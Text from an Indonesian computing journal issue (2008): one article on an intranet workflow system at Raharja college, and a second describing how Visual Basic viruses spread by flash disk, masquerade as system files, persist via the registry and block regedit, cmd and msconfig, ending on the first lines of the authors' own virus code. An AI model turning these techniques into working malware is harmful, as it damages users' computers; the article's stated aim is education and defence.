ISSN: 1978 - 8282 Berdasarkan analisis tersebut, dinyatakan bahwa untuk meningkatkan kemampuan daya saing yang dimiliki, diperlukan adanya pemanfaatan Teknologi Informasi (TI) yang sudah dikembangkan secara maksimal. Sehingga diharapkan tingkat pengembalian investasi dapat melebihi biaya modal yang dikeluarkan [Raha07]. Gambar di atas menunjukkan uraian lima faktor kekuatan tersebut untuk kalangan pendidikan. Di samping strategi pemanfaatan TI secara maksimal, controlling atau proses pengawasan performa perusahaan untuk memastikan bahwa jalannya perusahaan sesuai dengan rencana yang telah ditetapkan [Wiki07], juga merupakan hal yang penting di dalam setiap organisasi. Sebab, berdasarkan interelasi Perguruan Tinggi dengan stakeholder / 5 elemen masyarakat [Raha07], dinyatakan bahwa untuk menjadikan Perguruan Tinggi Raharja sebagai kampus unggulan dibutuhkan adanya manajemen yang baik, termasuk di dalam mengatur dan mengontrol jalannya workflow perusahaan.

Gambar 2. Interelasi Perguruan Tinggi dengan stakeholder / 5 elemen masyarakat [Raha07]

PERMASALAHAN Workflow atau otomatisasi proses bisnis yang meliputi perpindahan dokumen melalui suatu prosedur kerja [Wiki07] harus terus terkontrol dengan baik guna memastikan proses bisnis berjalan sesuai prosedur. Namun, dengan semakin kompleksnya ruang lingkup kerja suatu organisasi perusahaan, maka semakin tinggi pula keterkaitan antara proses kerja yang satu dengan yang lainnya. Hal ini mengakibatkan semakin sulitnya pengontrolan setiap alur kerja antar bagian perusahaan Vol.1 No.2 - Januari 2008

123

ISSN: 1978 - 8282 terkait dengan bertambahnya jumlah dokumen yang harus ditampung, diolah, dan didistribusikan ke bagian yang lain. Dalam proses workflow pada umumnya banyak mengandalkan kertas sebagai media untuk merekam segala jenis transaksi dan proses bisnis yang terjadi dalam perusahaan. Penggunaan kertas pada dasarnya memiliki kelemahan antara lain [Trip07]: 1. Memakan banyak biaya besar, untuk kertas dan penyimpanannya 2. Proses dapat hilang di tengah jalan, jika kertas hilang 3. Serta sulit untuk melacak kondisi atau status proses untuk satu proses tertentu Tidak hanya itu, konsistensi yang tinggi pada masing-masing individu untuk menjalankan tugas juga mutlak diperlukan, baik bagi bawahan sebagai penerima atau pelaksana tugas, maupun pimpinan yang memberikan instruksi kerja sekaligus memonitor jalannya alur kerja dalam perusahaan. Hal ini sesungguhnya memiliki pengaruh yang sangat besar terhadap sukses tidaknya suatu perusahaan di dalam menyelesaikan pekerjaannya, khususnya alur kerja yang melibatkan antar bagian dalam perusahaan. Dalam artikel ini, diidentifikasikan tiga masalah pokok yang sering dihadapi terkait dengan pelaksanaan workflow perusahaan, yaitu: 1. Rendahnya motivasi dalam diri individu untuk secara konsisten menjalankan tugas dan instruksi yang telah diberikan. 2. Kurangnya koordinasi dari masing-masing individu di dalam pelaksanaan alur kerja yang saling berhubungan antara bagian yang satu dengan bagian yang lain. 3. Sulitnya pengontrolan dari segi pimpinan untuk memastikan alur kerja berjalan sesuai prosedur. Berdasarkan ketiga masalah di atas, maka timbullah suatu pertanyaan: Bagaimana menciptakan suatu pengontrolan dan otomatisasi workflow pada perusahaan secara efektif melalui pemanfaatan teknologi informasi yang ada secara maksimal? PEMECAHAN MASALAH Untuk mengatasi permasalahan seperti yang telah dijelaskan di atas, maka solusi yang diberikan adalah berupa strategi di dalam pengelolaan dokumentasi secara elektronis yang terpadu dengan proses kerja yang ada pada suatu perusahaan, yakni dengan cara memanfaatkan konsep dan prinsip konektivitas digital serta sistem dari gaya kerja web yang sebelumnya telah diterapkan.

124

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282

Gambar 3. Technology of The World Wide Web [Clarke01]

Workflow dengan menggunakan Company Wide Web (CWW) merupakan konsep baru yang dikembangkan untuk mengontrol dan mengoptimalisasi pelaksanaan alur kerja dalam suatu perusahaan. Company Wide Web (CWW) didefinisikan sebagai suatu aplikasi berbasis web yang dapat digunakan untuk mengendalikan dan memonitor suatu proses yang berlangsung secara bertahap dalam perusahaan dengan mengintegrasikan alur kerja setiap bagian ke dalam satu sistem dengan antar muka yang sama. Adapun tahapan yang ada merupakan suatu skema aliran pekerjaan (workflow) sehingga setiap entitas flow berkait dengan kewenangan unit yang ada. CWW berperan sebagai gateway ke berbagai macam bagian yang berada di dalam perusahaan dengan cara menghubungkan pekerja, manajer, pemilik serta seluruh bagian perusahaan dalam ruang lingkup internal melalui intranet di dalam pertukaran informasi sekaligus pengontrolan proses bisnis perusahaan. Berikut adalah enam ciri khas sekaligus merupakan konsep CWW dalam memecahkan tiga masalah yang sering dihadapi oleh perusahaan, yaitu: 1. Tidak adanya web master di dalam pengelolaan CWW. 2. Antarmuka yang sama bagi seluruh bagian perusahaan yang terkait pada workflow 3. Penugasan dilakukan dengan cara memberikan alamat link yang berfungsi sebagai workspace. 4. Masing-masing mengelola bagiannya sendiri sesuai dengan workspace yang diberikan, termasuk isi dan tampilan halaman web.

Vol.1 No.2 - Januari 2008

125

ISSN: 1978 - 8282 5. Seluruh tugas dan pekerjaan masing-masing bagian ditampilkan di dalam web, sehingga mudah diakses oleh siapa saja yang masuk ke dalam website tersebut 6. Memanfaatkan teknologi jaringan internal perusahaan sebagai sarana pendistribusian pekerjaan. MANFAAT DAN TUJUAN Adapun tujuan dan manfaat dari penerapan Company Wide Web (CWW) dalam hal pengontrolan dan pengotomatisasian workflow adalah menyangkut efisiensi dan efektivitas di semua aspek kegiatan usaha perusahaan, antara lain: 1. Akses Informasi Sebagai pusat akses secara universal, CWW memperbaiki produktivitas dalam penyediaan akses yang terpadu terhadap informasi perusahaan, aplikasi perusahaan, business intelligence, dan collaboration tools. Mendukung penyediaan data dan informasi bagi penerapan kebijakan bisnis perusahaan dan pengambilan keputusan yang tepat. 2. Manajemen Alur Proses Workflow Menghubungkan proses yang terpisah-pisah yang akan mengarahkan perusahaan pada proses bisnis tanpa batasan, walaupun proses-proses tersebut berasal dari aplikasi yang berbeda-beda. 3. Manajemen Struktur Organisasi Memperbaiki hubungan kerjasama dengan seluruh bagian dalam perusahaan sebagai salah satu hasil dari pertukaran informasi, dan berjalan dalam jangka waktu panjang. Pegawai dapat bekerja lintas departemen dan lintas aplikasi dengan menggunakan antarmuka yang sama. 4. Manajemen Data Menerapkan document sharing, yaitu pemakaian dokumen secara bersamaan oleh beberapa user sekaligus. Di samping itu, menurunkan biaya tambahan, seperti: kertas, foto-copy, kabinet, dan lain-lain. 5. Sistem Pengarsipan Elektronik Electronic Filling System (EFS) Secara dramatis menurunkan ukuran ruang penyimpanan dokumen, menggantikan gudang dokumen dengan media penyimpanan elektronis yang jauh lebih kecil seperti harddisk, CD, ataupun MOD. Selain itu juga mengurangi risiko kehilangan ataupun kerusakan dokumen. 6. Meningkatnya Response Time Menghemat waktu dalam melakukan pencarian informasi, update, menyimpan, dan pendistribusian dokumen lebih cepat, sederhana untuk dipelajari, waktu untuk pelatihan dan administrasi yang lebih sedikit.

126

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 7. Keamanan Akses Aplikasi Mekanisme keamanan dokumen yang handal, yaitu mekanisme untuk mengatur kewenangan akses masing-masing user terhadap dokumen-dokumen yang tersimpan. DUKUNGAN TEKNOLOGI INFORMASI

Gambar 4. Infrastruktur Jaringan Perguruan Tinggi Raharja [Raha07]

Dukungan teknologi informasi diperlukan agar aplikasi pada masing-masing sistem informasi dapat berjalan dengan baik dan terintegrasi antara satu sistem informasi dengan sistem informasi lainnya, serta dengan seluruh unit kegiatan perusahaan. Saat ini Perguruan Tinggi Raharja mengimplementasikan jaringan lokal (Local Area Network) yang menghubungkan seluruh civitas akademika dan unit kegiatan di Perguruan Tinggi Raharja [Raha07], skema jaringan lokal Raharja dapat dilihat pada gambar di atas:

Vol.1 No.2 - Januari 2008

127

ISSN: 1978 - 8282 Dukungan Sistem Informasi dan Teknologi Informasi yang ada pada Perguruan Tinggi Raharja merupakan sebuah landasan yang sangat baik dalam pembangunan sebuah website lokal, dimana di dalamnya sudah terdapat database-database yang apabila diolah sedemikian rupa akan menghasilkan sumber data yang akurat untuk digunakan dalam pengembangan CWW. IMPLEMENTASI Konsep CWW (Company Wide Web) telah diterapkan pada Perguruan Tinggi Raharja, yaitu melalui implementasi Raharja Wide Web (RWW), yang merupakan konektivitas digital dan sistem dari gaya kerja web terhadap pelaksanaan proses bisnis perusahaan. RWW menekankan pada dampak yang terjadi pada sistem kerja manajemen dan karyawan Perguruan Tinggi Raharja dengan memanfaatkan koneksi digital. RWW menciptakan sebuah ruang universal baru bagi karyawan dan manajemen Perguruan Tinggi Raharja untuk saling berbagi informasi, berkolaborasi, dan untuk mengetahui perkembangan worksheet divisi atau personal sesuai dengan tugas dan fungsi masing-masing. Berikut adalah tampilan awal RWW:

Gambar 5. Halaman Utama Raharja Wide Web (RWW)

Di dalam setiap proses kerja perusahaan maupun perguruan tinggi, tak jarang melibatkan banyak bagian dalam perusahaan yang saling berhubungan satu dengan lainnya sehingga membentuk suatu alur kerja. Demikian pula yang terjadi pada

128

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Perguruan Tinggi Raharja, sebagai contoh adalah workflow di dalam pelaksanaan Rapat Kerja IV Perguruan Tinggi Raharja yang melibatkan seluruh divisi dalam Perguruan Tinggi. Penerapan workflow pada Rapat Kerja IV Perguruan Tinggi Raharja melalui RWW dapat digambarkan sebagai berikut: 1. Pada halaman utama RWW terdapat link untuk masuk ke website Raker IV, yaitu berupa gambar logo dari Raker IV yang terletak di bagian kiri bawah. Apabila pointer mouse diarahkan pada logo tersebut, maka akan muncul alamat link tujuan pada statusbar window aktif (Gambar 6). Dibalik alamat link yang tampil, sebenarnya melekat pula wewenang dan tanggung jawab karyawan atas penyerahan tugas yang telah diberikan sebelumnya oleh pimpinan. Dengan kata lain, dimana file itu tersimpan, maka disitulah wewenang dan tanggung jawab berada.

Gambar 6. Alamat Link Website Raker IV yang Muncul pada Statusbar

Jika dilihat dari contoh diatas, alamat link yang tampil adalah http://rww.stmikraharja.com/riani2/raker2007/, dimana file daripada website tersebut berada pada folder milik seorang karyawan bernama Riani. Itu artinya segala sesuatu yang menyangkut tampilan dan isi daripada halaman tersebut berada di bawah tanggung jawab si karyawan.

Vol.1 No.2 - Januari 2008

129

ISSN: 1978 - 8282 2. Apabila link tersebut dipilih, maka akan masuk ke dalam halaman web Rapat Kerja IV Perguruan Tinggi Raharja. Pada address bar halaman tujuan juga dapat dilihat dimana file tersebut berada (Gambar 7):

Gambar 7. Tampilan Halaman Awal Website Raker IV

Pada halaman tersebut juga terdapat link-link untuk masuk ke bagian-bagian lain yang terkait dengan workflow, antara lain: Akademik, Operasi, Keuangan dan Pemasaran, dan Raharja Enrichment Centre (REC). Masing-masing link telah diserahkan untuk dikelola oleh pihak yang terkait. Sebagai contoh, link untuk divisi akademik adalah http://rww.stmik-raharja.com/heriyanto2/raker2007/, karena penyerahan link juga disertai dengan penyerahan tugas dan tanggung jawab, maka segala sesuatu mengenai tampilan pada web tersebut berada di bawah tanggung jawab karyawan yang bersangkutan.

Gambar 8. Alamat Link Divisi Akademik yang Muncul pada Statusbar

130

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 3. Apabila link tersebut dipilih, maka akan masuk ke dalam website Raker IV sesuai dengan divisi yang dipilih, dalam contoh ini adalah untuk Divisi Akademik.

Gambar 9. Tampilan Halaman Awal Website Raker IV untuk Divisi Akademik

Di dalam halaman website tersebut, terdapat banyak link yang sebenarnya saling terkait antara satu dengan lainnya. Melalui halaman ini pula antara satu karyawan dengan karyawan lainnya dapat bertukar dan berbagi informasi. 4. Di dalam halaman tersebut sebenarnya telah terdapat workflow antara satu karyawan ke karyawan lain. Sebagai contoh: berdasarkan Gambar 9 dibawah, dapat dilihat bahwa tugas untuk penyelesaian FINAL LKPJ DETAIL berada di bawah tanggung jawab karyawan bernama sugeng dengan folder mr_sam2.

Gambar 10. Alamat FINAL LKPJ DETAIL yang Muncul pada Statusbar

Vol.1 No.2 - Januari 2008

131

ISSN: 1978 - 8282 Apabila untuk keperluan penyelesaian tugas tersebut si karyawan memerlukan beberapa bahan sebagai materi, maka ia dapat memperoleh materi-materi tersebut melalui link-link lainnya pada halaman tersebut, yang sudah disediakan oleh karyawan bernama Heriyanto (pemegang hak akses atas halaman website Raker IV Divisi Akademik). Sebagai contoh, ia membutuhkan materi berupa KPI kurikulum dan bahan ajar, maka ia dapat menemukannya pada halaman LKPJ DETAIL milik karyawan bernama Padeli dengan memilih link LKPJ DETAIL pada halaman website Raker IV Divisi Akademik. Dengan demikian, ia dapat memperoleh materi yang ia butuhkan tanpa harus berhubungan atau meminta langsung kepada karyawan bersangkutan. Hal ini tentu saja menjadikan proses penyelesaian tugas menjadi lebih jauh cepat. Keadaan yang dihadapi oleh karyawan di atas inilah yang juga berlaku untuk karyawan-karyawan lainnya. Sehingga apabila setiap karyawan yang membutuhkan informasi dapat menemukan seluruh jawabannya secara elektronis melalui CWW tanpa harus berhubungan langsung secara fisik, maka dapat dipastikan otomatisasi workflow dalam perusahaa akan tercipta dengan sendirinya. Lalu bagaimana jika seorang karyawan tidak menyelesaikan kewajibannya dengan baik? Dengan kata lain membiarkan halaman web yang seharusnya ia kelola kosong atau tidak terurus?

Gambar 11. Alamat Website yang Tidak Terurus dengan Baik

Disinilah peran pimpinan dibutuhkan. Pimpinan yang baik harus selalu memonitor pekerjaan bawahannya, apakah mereka menyelesaikan tugas yang telah diberikan dengan baik, dengan cara melihat langsung dan masuk ke dalam halaman website yang terdapat di dalam CWW perusahaan tersebut. Sehingga, dari segi karyawan itu sendiri akan termotivasi untuk menyelesaikan tugasnya dengan baik apabila pekerjaannya itu senantiasa dipantau oleh pimpinan.

132

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 KESIMPULAN Dengan diterapkannya CWW pada perusahaan, maka sekaligus dapat menciptakan suatu otomatisasi workflow yang dapat meningkatkan motivasi, koordinasi, dan pengontrolan di dalam perusahaan. Sehingga dipastikan kinerja perusahaan juga akan meningkat. DAFTAR PUSTAKA 1. Clarke, Roger (2001). Defamation on The Web. The Australian National University, Canberrra. Available online at: http://www.anu.edu.au/people/Roger.Clarke/II/ DefWeb01.html. Access 26 November 2007. 2. Porter, Michael (1985). Competitive Advantage : Creating and Sustaining Performance. New York Free Press. 3. Rahardja Untung (2007). Analisis Kelayakan Investasi Digital Dashboard pada Manajemen Akademik Perguruan Tinggi: Studi Kasus pada Perguruan Tinggi Raharja. Thesis. Program Studi Magister Teknologi Informasi. Fakultas Ilmu Komputer. Universitas Indonesia. 4. Rahardja Untung dkk (2007). Artikel CCIT Journal Edisi 1 Vol. 1 Metode Perancangan Data dengan Menggunakan Intelligence Auto Find System (IAFS), Perguruan Tinggi Raharja, Tangerang. 5. Rahardja Untung, dkk (2007). Project Penelitian Raharja Wide Web (RWW) Pada Perguruan Tinggi Raharja, Perpustakaan PT Raharja, Tangerang. 6. E d s ( 0 6 .Ebdesk: eBusiness Enabler. Available online at : http://www. bek 20) ebdesk.com/library/marketing/ebdesk-cp-indo.pdf. Access 27 September 2007. 7. Anonim. Workflow: Dari Wikipedia I ndonesia, ensiklopedia bebas berbahasa Indonesia. Available online at: http://id. wikipedia. org/wiki/Workflow. Access 27 September 2007. 8. Anonim. Controlling: Dari Wikipedia Indonesia, ensiklopedia bebas berbahasa Indonesia. Available online at: http://id.wikipedia.org/wiki/Manajemen. Access 27 September 2007. 9. Anonim. Workflow: Manajemen Workflow Dokumen. Available online at: http:// members.tripod.com/prosesbisnis/wf.htm. Access 26 September 2007. Vol.1 No.2 - Januari 2008133

ISSN: 1978 - 8282

REKAYASA TEKNIK PEMROGRAMAN PENCEGAHAN DAN PERLINDUNGAN DARI VIRUS LOKAL MENGGUNAKAN API VISUAL BASICJunaidi 1 Sugeng Santoso 2 Lusyani Sunarya 3 [email protected], [email protected] ABSTRAKSIBelakangan ini perkembangan virus yang begitu cepat membuat pengguna komputer merasa kesal, apabila komputernya berjalan sangat lambat tidak seperti biasanya, hal ini mungkin telah terinfeksi virus. Dari sekian banyaknya virus, beberapa diantaranya merupakan virus lokal yang beberapa bulan terakhir sedang gencar-gencarnya menyerang. Virus lokal yang dibuat dengan bahasa pemrograman visual basic, mempunyai beragam nama dan varian, juga memiliki keragaman teknik penyerangan dan pertahanan, biasanya aktivitas penyerangan sulit untuk diketahui. Namun demikian, jika kita mencoba memahami teknik penyerangan, penyebaran dan pertahanannya, virus lokal yang dibuat dengan bahasa pemrograman visual basic, hampir memiliki kemiripan teknik penyerangan, penyebaran dan pertahanan, sehingga mudah bagi yang mengerti untuk mengetahui penyerangan dan pertahanan virus lokal. Rekayasa virus lokal dengan visual basic meliputi teknik menginfeksi flashdisk dari sebuah komputer, menginfeksi komputer target dimana flashdisk terpasang, menggandakan diri ke folder tertentu (umumnya beberapa folder inti seperti windows, system32 dan lain sebagainya). Kemudian virus lokal ini akan menginfeksi registry, pemblokiran registry, cmd, msconfig, sysedit, pengatur folder option dan masih banyak lagi yang akan dibahas satu persatu dalam memahami teknik penyerangan dan pertahanan virus lokal serta pembuatannya melalui bahasa pemrograman visual basic. Dilihat dari teknik infeksi sistem, penggandaan ke sistem dan infeksi registry, virus lokal yang dibuat dengan bahasa pemrograman visual basic mudah untuk diciptakan bagi yang sedikit mengerti dan mudah untuk dimusnahkan bagi yang sedikit mengerti, hal ini sangat tergantung dari tingkat pemahaman. Atas dasar itulah penelitian ini dilakukan untuk memberikan gambaran tentang teknik pembuatan virus lokal dalam hal penyerangan dan pertahanannya. Kata Kunci : Virus, Registry, Infeksi, Penyerangan, Pertahanan

1. Dosen Jurusan Teknik Informatika, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 2. Dosen Jurusan Teknik Informatika, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692 3. Dosen Jurusan Teknik Informatika, STMIK Raharja Jl. Jend Sudirman No.40 Modern Cikokol-Tangerang Telp 5529692

134

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 PENDAHULUAN Maraknya virus komputer belakangan ini, cukup membuat para pengguna komputer resah dan sangat menyebalkan, apalagi kalau virus tersebut mulai melakukan penyerangan, komputer akan berjalan sangat lambat, karena ada beberapa aplikasi yang berjalan secara tersembunyi, dimana virus sedang melakukan penyusupan dengan menggandakan dirinya kebeberapa folder sistem dan alamat target. Hingga pada akhirnya virus tersebut mampu membuat space hardisk semakin berkurang, memori semakin terbatas, bahkan dapat melakukan manipulasi file, pengrusakan data dan masih banyak lagi, hal ini sangat tergantung dari kemampuan virus. Hebatnya lagi adalah, virus mampu melindungi dirinya dari segala sesuatu yang mengancam, mulai dari menginfeksi registry, memblokir beberapa fasilitas yang dapat mematikan dirinya, melakukan restart otomatis, bahkan sampai melakukan pengrusakan sistem dan pemformatan hardisk hingga sistem komputer mati total, dan pada akhirnya virus akan musnah bersama musnahnya sistem komputer yang terserang. Kemudian bisa saja virus akan aktif kembali ketika kita tanpa sengaja menjalankan atau membangkitkan suatu virus, maka yang pasti dilakukan virus tersebut setelah bangkit dari tidurnya adalah menginfeksi sistem agar melekat pada komputer target. Sehingga meskipun komputer tersebut telah direstart, virus tersebut akan tetap aktif, dan virus tersebut kembali menyerang dari satu lokasi ke lokasi yang lain, dari satu komputer ke komputer yang lainnya melalui jaringan atau media pertukaran data. Berbekal dari pengalaman yang berkali-kali terserang virus, hingga berkali-kali pula melakukan pemformatan dan penggantian hardisk, pada akhirnya mulai tertarik untuk meneliti dan mempelajari bagaimana virus dibuat, tentunya sesuai dengan kemampuan dalam pemrograman visual basic, penulis mulai melakukan berbagai percobaan dan pengkajian. Diawali dengan melepaskan antivirus, membiarkan virus masuk untuk kemudian menangkapnya dan membongkarnya, hingga pada akhirnya memahami bagaimana teknik penyerangan dan pertahanan virus. Diawali dengan terbongkarnya beberapa virus lokal yang dibuat dengan visual basic script, penulis melakukan beberapa penyesuaian dengan visual basic dan windows API, mulai dari teknik penyerangan sistem, penggandaan diri dan pertahanan dari ancaman, hingga sampai pada persembunyian, perkenalan, gangguan dan pengrusakan. Dan pada akhirnya dipaparkan secara terbuka pada artikel yang berjudul Rekayasa Teknik Penyerangan dan Pertahanan Virus Lokal Dengan API Visual Basic. Dari paparan diatas tentunya kita bertanya akan adanya beberapa permasalahan yang harus dipecahkan, bagaimana mungkin virus dibuat sedemikian rupa dengan

Vol.1 No.2 - Januari 2008

135

ISSN: 1978 - 8282 beberapa kemampuan?, adakah program aplikasi yang mampu membuat virus dengan mudah?, mampukah visual basic membuat virus lokal dengan teknik penyerangan dan pertahanan ? bagaimanakah rekayasa teknik penyerangan dan pertahanan virus dengan API Visual basic ? Walaupun akan membahas tentang rekayasa teknik penyerangan dan pertahanan virus, penulis membatasi pembahasan hanya pada teknik penyerangan dan pertahanan dengan API Visual Basic, tidak sampai pada teknik pengrusakan dan pemusnahan. Hal ini dimaksudkan karena tulisan ini untuk menambah wawasan dalam penanganan virus, sehingga mampu memberikan gambaran bagaimana memusnahkan sebuah virus dari komputer yang terserang, dengan harapan dapat memberikan sesuatu yang positif dan bukan digunakan untuk tujuan negatif. PEMBAHASAN Bahasa pemrograman visual basic dengan menggabungkan beberapa fasilitas API, belakangan ini kerap kali digunakan sebagai media dalam pembuatan virus lokal, hal ini dapat dilihat dari maraknya virus menyerang beberapa komputer, baik itu dibuat dengan visual basic script dengan menggunakan text editor biasa, maupun dibuat dengan bahasa pemrograman visual basic, dan untuk memaksimalkan fungsinya agar tidak memiliki ketergantungan secara utuh terhadap visual basic, diantara source codenya menggunakan fasiltas API. Secara mendasar VB mirip dengan bahasa pemrograman yang lain, misalnya Basic, C dan Pascal (tetapi tentu saja sintak dari tiap-tiap bahasa tidak sama persis). Lompatan besar VB adalah kemampuannya untuk memanfaatkan windows. VB tidak memerlukan pemrograman khusus untuk menampilkan jendela, dan cara penggunaanya juga berbasis visual seperti aplikasi windows lainnya, namun demikian pada tahapan ini kita lebih banyak menggunakan script dalam perancangannya. Hampir seluruh pengguna komputer mendengar istilah virus komputer, ratarata beranggapan bahwa virus komputer adalah program yang merusak data dan mengganggu kinerja komputer. Namun demikian, tidak sedikit diantara mereka yang mendengar virus komputer tidak begitu memahami bagaimana virus beroperasi, apa saja bagian yang diserang dan bagaimana ia mempertahankan diri. Kebanyakan diantara mereka, mengandalkan pada beberapa antivirus yang telah ada. Tapi pada kenyataanya, tidak semua antivirus mampu memulihkan komputer yang telah terinfeksi virus, apalagi antivirus yang ada tidak diupdate. Hal ini sangat dimungkinkan, karena biasanya virus selangkah lebih maju dari antivirus.

136

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Dalam implementasinya, sebelum virus dilepaskan untuk beroperasi, ada beberapa kemampuan dasar yang harus dimiliki, yaitu kemampuan menyembunyikan diri, mengaktifkan diri setiap startup sistem, menyebar melalui media file executable, mempercepat proses penyebaran melalui media pertukaran data dan informasi, mempercepat penyebaran dengan memanfaatkan kelemahan suatu sistem, menyebar dengan file name spoofing, mempercepat proses penyebaran dengan pendekatan social engineering serta kemampuan dalam membangun pertahanan untuk menjaga eksistensi dirinya. Diantara kemampuan yang harus dimiliki virus komputer agar dapat bekerja lebih maksimal, hanya beberapa kemampuan saja yang menjadi fokus pembahasan, yaitu kemampuan dalam menginfeksi sistem, menyembunyikan dan menyerbarkan diri serta kemampuan dalam pertahanan. 1. Melakukan Penggandaan Ke Sistem Proses penggandaan ke sistem berfungsi agar virus tetap aktif pada saat komputer direstart. Biasanya hasil penggandaan ke sistem mempunyai nama yang hampir sama dengan nama file system dan ada juga yang sama persis dengan nama file system, hanya saja lokasi file tersebut berbeda dengan file aslinya atau pada lokasi yang sama dan terjadi sedikit perbedaan di nama file yang hampir tidak diketahui perbedaanya (contoh winlogon.exe, lsass.exe, services.exe, csrss.exe, iexplorer.exe, shell.exe, smss, svchost.exe, system.exe, taskmgr.exe, explorer.exe, notepad.exe, winword.exe, dll). Ketika virus dijalankan, maka virus tersebut akan mulai melakukan aktivitasnya sebagai virus yaitu dengan melakukan penggandaan ke sistem komputer. Hal ini dilakukan agar virus tetap berada pada sistem meskipun sarana media penyebarannya telah dilepas, virus tersebut akan tetap aktif dengan cara mengaktifkan virus yang tercopy di sistem sehingga sistem benar-benar telah terinfeksi virus. Lokasi folder penggandaan virus pada sistem biasanya meliputi windows / winnt, system32, startup, application data. Lokasi ini biasanya paling sering digunakan, karena menurut orang awam file pada lokasi ini tidak boleh dihapus, dan hampir semua file yang ada merupakan file penting, dan jika terjadi penghapusan akan mengalami kerusakan, hal ini dimanfaatkan oleh virus untuk melindungi dirinya. Selain lokasi folder, virus juga melakukan perubahan extension untuk menyamar agar sulit dicari. Extention files yang sering digunakan pada saat melakukan penggadaan pada sistem misalnya exe, scr, com dan pif. Extension ini semuanya memiliki cara akses yang sama. Meskipun terjadi perubahan extension, tetap akan berjalan dengan normal.

Vol.1 No.2 - Januari 2008

137

ISSN: 1978 - 8282 Agar penyamaran sukses virus juga menggunakan penamaan yang hampir sama dengan file sistem atau bahkan memang sama hanya saja lokasi file yang berbeda, dengan tujuan membuat bingun, karena sulit membedakan antara file sistem yang asli dengan yang palsu (virus). Penamaan file dengan winlogon.exe, lsass.exe, services.exe, csrss.exe, smss.exe, akan dilindungi oleh task manager sehingga tidak dapat dimatikan prosesnya oleh task manager. 2. Melakukan Pengaturan Registry Virus yang berjalan pada sistem operasi windows tidak dapat lepas dari bantuan registry yang dapat membuat virus tersebut mampu memiliki daya tahan yang sangat kuat sehingga sulit sekali untuk dimusnahkan. Registry dimanfaatkan virus sebagai suatu tameng atau benteng pertahanan yang dapat melindunginya dari berbagai seranganserangan yang dapat membuat dirinya (virus) musnah dari computer yang telah terinfeksi. Misalkan kita telah berhasil mematikan suatu virus dengan menggunakan program task manager ataupun program sejenisnya tanpa melakukan pembersihan pada registry. Dimana virus telah memasang suatu kunci pada registry yang akan mengaktifkan dirinya jika user menjalankan suatu aplikasi, maka sudah bisa pastikan bahwa virus tersebut akan aktif kembali. Fungsi untuk menyeting registry yang digunakan oleh virus tidak banyak virus hanya memerlukan suatu fungsi untuk membuat kunci (Biasanya DWORD dan STRING) dan menghapus suatu kunci registry (Biasanya jarang digunakan). 3. Melakukan Pengaktifan Virus Pada Sistem Jika virus telah melakukan penggandaan di system computer maka virus tersebut akan mengaktifkan hasil penggandaannya yang telah berada disistem, sehingga meskipun flashdisk atau pun media penyimpanan lainnya yang digunakan sebagai suatu sarana penyebaran virus tersebut dilepas maka virus tersebut akan tetap aktif. Untuk melakukan pengaktifan virus yang telah berada pada sistem komputer virus tersebut hanya melakukan suatu perintah untuk menjalankan virus yang berada di sisem computer tersebut dengan perintah Shell atau dengan perintah ShellExecute. 4. Rekayasa Teknik Penyebaran 4.a Membaca Address Bar Pada Window Explorer Teknik ini sangat baik selain proses penyebaran sangat cepat juga tidak memerlukan suatu teknik pencarian suatu file. Mengapa tidak memerlukan

138

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 pencarian? Karena user telah memberikan informasi lokasi suatu file yang dianggap penting oleh user dengan cara membuka folder tersebut menggunakan windows explorer yang selanjutnya digunakan user untuk menjalankan file tersebut. Virus yang mendapatkan lokasi tersebut langsung menggandakan diri kedalamnya. Biasanya penamaan file dari hasil penggandaan virus tersebut diambil dari nama subfolder yang sedang terbuka. 4.b Membaca Folder Dan Sub Folder Pada Drive Hardisk Cara penggandaan yang satu ini sangat memakan banyak waktu untuk proses penyebaran. Tapi jika penyebarannya berhasil bisa dibayangkan kalau cara penggandaannya berdasarkan subfolder saja untuk satu partisi system saja bisa mencapai ribuan coba kalau user tersebut menggunakan Multi OS dikomputernya. Bayangkan saja!!!. Apalagi kalau sistem penggandaannya berdasarkan file-file yang ada dipartisi, pasti lebih heboh lagi. 5. Rekayasa Teknik Penyerangan Setelah virus tersebut melakukan penggandaan ke system, mengubah registry, baru virus tersebut melakukan penyerangan (pengrusakan). Serangan virus ini yang sangat ditakuti oleh pengguna komputer. Tetapi jika virus tersebut hanya melakukan penyebaran itu bukan masalah karena tidak melakukan pengrusakan. Dalam hal ini kita tidak akan membahas bagaimana teknik penyerangan untuk tingkat pengeruskana, hal ini dimaksudkan karena tulisan ini pada intinya bertujuan hanya untuk pendidikan. IMPLEMENTASI Sebagai bentuk uji coba dan pembuktian dari penelitian ini, berikut adalah source code dari program virus yang dibuat dengan visual basic. Program yang diberi nama RekayasaVirus.exe ini sengaja dibuat sangat sederhana dengan sedikit dampak, namun tidak membatasi terhadap kemampuannya dalam memblokir beberapa fasilitas yang membahayakan keberadaannya, seperti melakukan proses hidden file pada windows explorer maupun taskbar dan task manager, melakukan pemblokiran terhadap registry, run, msconfig, cmd, folder options dan lain sebagainya. Program ini menggunakan satu file project, satu form, satu module, satu label pada form, satu control timer pada form dengan pengaturan interval 100 serta penggunaan script pada form dan module dengan beberapa fungsi.

Vol.1 No.2 - Januari 2008

139

ISSN: 1978 - 8282 Rancangan form pada program RekayasaVirus (Gambar-1):

Gambar 1 Tampilan form dengan penggunaan satu label untuk memunculkan jam pada sistem

Pengaturan pada project explorer dan properties (Gambar-2):

Gambar 2 Penamaan project, file, form, module pada project explorer dan caption pada properties

Penggunaan control timer untuk mendukung proses penyebaran (Gambar-3):

Gambar 3 Penggunaan Timer Untuk Mendukung Proses Penggandaan File dan Penyebaran Melalui Flash Disk

140

Vol.1 No.2 - Januari 2008

ISSN: 1978 - 8282 Code pada form dengan memanggil fungsi pada module:Private Sub Form_Load() App.TaskVisible = False Main End Sub

